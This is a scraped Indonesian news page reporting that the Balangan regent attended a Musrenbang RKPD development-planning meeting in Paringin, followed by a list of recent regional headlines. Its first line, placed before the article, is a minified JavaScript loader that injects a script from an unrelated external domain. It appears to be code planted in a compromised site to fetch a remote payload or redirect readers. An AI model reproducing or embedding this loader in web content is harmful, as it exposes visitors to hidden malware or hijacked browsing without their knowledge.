(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Bupati Balangan Hadiri Musrenbang RKPD di Kecamatan Paringin


KANALKALIMANTAN.COM, PARINGIN – Bupati Balangan Abdul Hadi menghadiri acara Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Kerja Pemerintah Daerah (RKPD) Tahun 2022 bertempat di Aula Mayang Maurai Komplek Garuda Maharam Kecamatan Paringin, Rabu (29/3/2022).

Musrembang RKPD tahun 2022 dalam rangka penyusunan RKPD Kabupaten Balangan Tahun 2023 dengan mengangkat Tema “Peningkatan Infrastruktur, Sumber Daya Manusia dan Potensi Daerah Untuk Melanjutkan Perekonomian Berkelanjutan.”

Hadir dalam kegiatan ini, Bupati Abdul Hadi, unsur Forkopimda, Bappeda Provinsi Kalsel, Kepala SKPD, tokoh agama, tokoh masyarakat, pimpinan instansi vertikal serta pimpinan organisasi masyarakat di Kabupaten Balangan.

Bupati Abdul Hadi menyebutkan, dalam rancangan RKPD 2023, harus dapat dipilah program yang menjadi proyek strategis, serta meminta visi misi kepemimpinannya pada tahun 2023 harus dieksekusi dan tuntas.

 

 

Baca juga: Anggota Brimob Gadungan di Berau, Tipu 9 Wanita, Satu Sedang Hamil

“Tugas Bappeda, pilah mana-mana proyek strategis, proyek tidak boleh gagal. Dan yang menjadi tulang punggung visi misi Bupati, kawal serta pastikan terlaksana tepat waktu,” tegasnya.

Khusus kepada jajaran Inspektorat Kabupaten Balangan, Abdul Hadi juga meminta, untuk mempersiapkan SKPD, agar tidak takut dalam melaksanakan proyek-proyek strategis.

“Selain berupaya menuntaskan program pembangunan di daerah, kita juga tetap berkomitmen mendukung program-program Pemerintah Provinsi maupun Pemerintah Pusat,” tambah Abdul Hadi.

Sementara itu, Kepala Bappedalitbang Balangan, Rakhmadi Yusni mengatakan, Musrenbang merupakan rangkaian yang menampung usulan permasalahan dari bulan Januari, dengan tahapan dimulai dari tingkat desa, kecamatan sampai kabupaten.

“Musrenbang yaitu memadukan sinkronisasi program dari battom up sampai top down, jadi tidak bicara jumlah usulan lagi, karena usulannya sudah masuk semua,” katanya.

Diungkapkan Rakhmadi Yusni, untuk usulan yang masuk ada 1.446 usulan, ditambah pokok pikiran DPRD Balangan sebanyak 900 usulan lebih.

“Tentu sesuai harapan Bupati, Musrenbang ini menerjemahkan RPJMD ke dalam visi misi Bupati, sehingga visi misi bisa terpenuhi sesuai target,” pungkas Rakhmadi Yusni. (Kanalkalimantan.com/alfi)

Reporter: alfi
Editor: cell


Risa

Recent Posts

Sempat Sengat Pelajar Madrasah, Sarang Tawon Dalam Kelas Dievakuasi Damkar HSU

KANALKALIMANTAN.COM, AMUNTAI - Khawatir membahayakan para pelajar, sarang tawon berukuran sedang berhasil dievakuasi petugas Pemadam… Read More

49 menit ago

Peningkatan Kapasitas Anggota BPD, Ini Kata Pj Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan menilai penting peranan… Read More

56 menit ago

Dua Raperda Disahkan, Ketua DPRD: Payung Hukum yang Jelas Bagi Cagar Budaya di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dua buah Rancangan Peraturan Daerah (Raperda) Kota Banjarbaru disahkan dalam rapat paripurna… Read More

3 jam ago

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

5 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

7 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

8 jam ago

This website uses cookies.